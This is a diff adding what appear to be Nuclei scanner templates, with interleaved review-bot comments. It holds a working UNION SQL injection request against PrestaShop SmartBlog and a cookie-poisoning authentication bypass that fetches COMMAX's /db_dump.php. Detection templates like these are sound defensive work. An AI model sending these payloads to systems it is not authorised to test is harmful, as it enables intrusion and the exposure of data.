diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml
new file mode 100644
index 0000000000..758e66491c
--- /dev/null
+++ b/cves/2021/CVE-2021-37538.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-37538
+
+info:
+ name: PrestaShop SmartBlog SQL Injection
+ author: whoever
+ severity: high
+ description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
+ tags: cve,cve2021,prestashop,smartblog,sqli
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
+ - https://blog.sorcery.ie/posts/smartblog_sqli/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "c5fe25896e49ddfe996db7508cf00534"
+ part: body
diff --git a/technologies/teradici-pcoip.yaml b/technologies/teradici-pcoip.yaml
new file mode 100644
index 0000000000..2fcaf22733
--- /dev/null
+++ b/technologies/teradici-pcoip.yaml
@@ -0,0 +1,23 @@
+id: teradici-pcoip
+
+info:
+ name: Teradici PCoIP Detection
+ author: pdteam
+ severity: info
+ tags: tech,pcoip
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/info/"
+
+ matchers:
+ - type: word
+ words:
+ - "PCoIP Connection Manager"
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - 'PCoIP Connection Manager\/([0-9.]+)\.'
\ No newline at end of file
diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
new file mode 100644
index 0000000000..dfdc0ae4a8
--- /dev/null
+++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml
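Review bot: The `info` block of cves/2021/CVE-2021-37538.yaml names the affected range but gives the operator no fix and no classification. The description already says versions below 4.0.6 are vulnerable, so `remediation: Upgrade the SmartBlog module to 4.0.6 or later.` follows from it (confirm the fixed version against the listed references). A `classification` block with `cve-id: CVE-2021-37538` would make findings easier to correlate. A one-line comment above `path`, such as `# read-only probe: selects MD5 of the constant 55555; the word matcher is expected to be that digest`, would let a reviewer check the matcher without recomputing it.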
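Review bot: The extractor regex in technologies/teradici-pcoip.yaml, `'PCoIP Connection Manager\/([0-9.]+)\.'`, requires a literal dot after the capture group, so the reported version always loses its last dotted component. A banner whose version has no dot would match the word matcher but extract nothing. If dropping the build number is intended, say so in a comment; otherwise `'PCoIP Connection Manager\/([0-9]+(?:\.[0-9]+)*)'` captures the full version without a trailing dot. Neither the matcher nor the extractor sets `part`, so both fall back to the default, and it would be clearer to state `part: body` (or `header`, if that is where the banner appears). The file also ends without a newline, which this same commit fixes in wp-woocommerce-pdf-invoice-listing.yaml.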
@@ -0,0 +1,35 @@
+id: commax-biometric-auth-bypass
+
+info:
+ name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
+ author: gy741
+ severity: critical
+ description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
+ reference:
+ - https://www.exploit-db.com/exploits/50206
+ - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
+ tags: commax,auth-bypass
+
+requests:
+ - raw:
+ - |
+ GET /db_dump.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Referer: {{BaseURL}}/user_add.php
+ Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "::: COMMAX :::"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
index 6ca5d17599..d7670dd3da 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
@@ -1,7 +1,7 @@ id: wp-woocommerce-pdf-invoice-listing info: - name: WordPress Upload Fuzzing + name: Woocommerce PDF Invoice Exposure author: mohammedsaneem,sec_hawk severity: medium description: Allows attacker to view sensitive information such as company invoices
@@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200
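Review bot: The matchers in commax-biometric-auth-bypass.yaml do not show that the protected page was actually served. They require only status 200, a `text/html` header and the string `"::: COMMAX :::"`, which looks like a product banner that an unauthenticated login or error page could also carry (not verifiable from this hunk). Because the template is rated `critical`, a device that answers `/db_dump.php` with its login page and a 200 would be reported as a critical bypass. Add a body word that occurs only in the authenticated `db_dump.php` output, e.g. `- "<MARKER_UNIQUE_TO_DB_DUMP_PAGE>"` (placeholder; take it from a confirmed response), or a `negative: true` word matcher on a login-form string. The banner matcher should also state `part: body` explicitly, as the header matcher already states its part.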